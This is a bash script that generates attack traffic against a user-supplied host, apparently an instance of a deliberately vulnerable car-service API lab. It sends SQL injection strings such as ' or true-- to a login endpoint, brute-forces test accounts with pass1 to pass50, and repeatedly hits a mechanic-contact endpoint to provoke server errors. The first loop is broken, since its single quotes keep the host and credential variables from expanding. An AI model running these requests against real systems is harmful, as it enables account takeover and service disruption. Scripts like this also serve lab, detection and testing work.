#!/bin/bash #Prompt the user to enter the value of HOSTNAME read -p "Enter the HOSTNAME: " HOSTNAME # Define the email addresses EMAILS=( 'apilab@akamai.com' 'apilab2@akamai.com' 'apilab3@akamai.com' 'apilab4@akamai.com' ) # Define the list of passwords PASSWORDS=( '-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" 'or true--' "or true--" 'or true--' ') or true--' "') or true--" "') or true--" ) # Define the common password COMMON_PASSWORD='cRaPi2023!!!' echo "GENERATING REQUESTS FOR LOGIN ENDPOINT WITH SQL PAYLOAD" for email in "${EMAILS[@]}"; do for password in "${PASSWORDS[@]}"; do curl 'http://$HOSTNAME/identity/api/auth/login' \ -H 'Accept: */*' \ -H 'Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6' \ -H 'Cache-Control: no-cache' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/json' \ -H 'DNT: 1' \ -H 'Origin: http://$HOSTNAME' \ -H 'Pragma: no-cache' \ -H 'Referer: http://$HOSTNAME/login' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36' \ --data-raw $'{"email":"$email","password":"$password"}' \ --compressed \ --insecure \ -o /dev/null > /dev/null 2>&1 done done echo "----------------COMPLETE---------------------------------" echo "GENERATING REQUESTS FOR LOGIN ENDPOINT TO TRY DIFFERENT PASSWORDS FOR BRUTE FORCE AUTHENTICATION" # Define the password range for ((i=1; i<=50; i++)); do PASSWORD="pass$i" for email in "${EMAILS[@]}"; do curl "http://$HOSTNAME/identity/api/auth/login" \ -H "Accept: */*" \ -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \ -H "Cache-Control: no-cache" \ -H "Connection: keep-alive" \ -H "Content-Type: application/json" \ -H "DNT: 1" \ -H "Origin: http://$HOSTNAME" \ -H "Pragma: no-cache" \ -H "Referer: http://$HOSTNAME/login" \ -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \ --data-raw "{\"email\":\"$email\",\"password\":\"$PASSWORD\"}" \ --compressed \ --insecure | jq -j done done echo "----------------COMPLETE---------------------------------" # Function to obtain access token for a given email and password get_access_token() { local email=$1 local password=$2 # Use curl to get the access token and jq to extract it local access_token=$(curl "http://$HOSTNAME/identity/api/auth/login" \ -H 'Content-Type: application/json' \ --data-raw '{"email":"'"$email"'","password":"'"$password"'"}' \ --insecure -s | jq -j .token) echo "$access_token" } # Define the common password COMMON_PASSWORD='cRaPi2023!!!' # Define the email addresses emails=( 'apilab@akamai.com' 'apilab2@akamai.com' 'apilab3@akamai.com' 'apilab4@akamai.com' ) echo "GENERATIC REQUESTS FOR CONTACT MECHANIIC ENDPOINT FOR 5XX SERVER ERRORS" for ((x=1; x<=20; x++)); do for ((i=0; i<${#emails[@]}; i++)); do # Generate access token ACCESS_TOKEN=$(get_access_token "${emails[i]}" "$COMMON_PASSWORD") # Define VINs VINS=("8WNFQ29UASO325881" "2QJHA06QPTA452548" "9MZWD50MITK534430" "2QBSC54ZIHY224823") VIN=${VINS[i]} # Execute first curl command curl "http://$HOSTNAME/workshop/api/merchant/contact_mechanic" \ -H "Accept: */*" \ -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \ -H "Authorization: Bearer $ACCESS_TOKEN" \ -H "Cache-Control: no-cache" \ -H "Connection: keep-alive" \ -H "Content-Type: application/json" \ -H "DNT: 1" \ -H "Origin: http://$HOSTNAME" \ -H "Pragma: no-cache" \ -H "Referer: http://$HOSTNAME/contact-mechanic?VIN=$VIN" \ -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \ --data-raw "{\"mechanic_code\":\"T567\",\"problem_details\":\"123\",\"vin\":\"$VIN\",\"mechanic_api\":\"http://$HOSTNAME/workshop/api/mechanic/receive_report\",\"repeat_request_if_failed\":false,\"number_of_repeats\":1}" \ --compressed \ --insecure \ -o /dev/null > /dev/null 2>&1 # Execute second curl command curl "http://$HOSTNAME/workshop/api/merchant/contact_mechanic" \ -H "Accept: */*" \ -H "Accept-Language: en-CA,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,de;q=0.6" \ -H "Authorization: Bearer $ACCESS_TOKEN" \ -H "Cache-Control: no-cache" \ -H "Connection: keep-alive" \ -H "Content-Type: application/json" \ -H "DNT: 1" \ -H "Origin: http://$HOSTNAME" \ -H "Pragma: no-cache" \ -H "Referer: http://$HOSTNAME/contact-mechanic?VIN=$VIN" \ -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" \ --data-raw "{\"mechanic_code\":\"123\",\"problem_details\":\"123\",\"vin\":\"$VIN\",\"mechanic_api\":\"http://$HOSTNAME/workshop/api/mechanic/receive_report\",\"repeat_request_if_failed\":false,\"number_of_repeats\":1}" \ --compressed \ --insecure \ -o /dev/null > /dev/null 2>&1 done done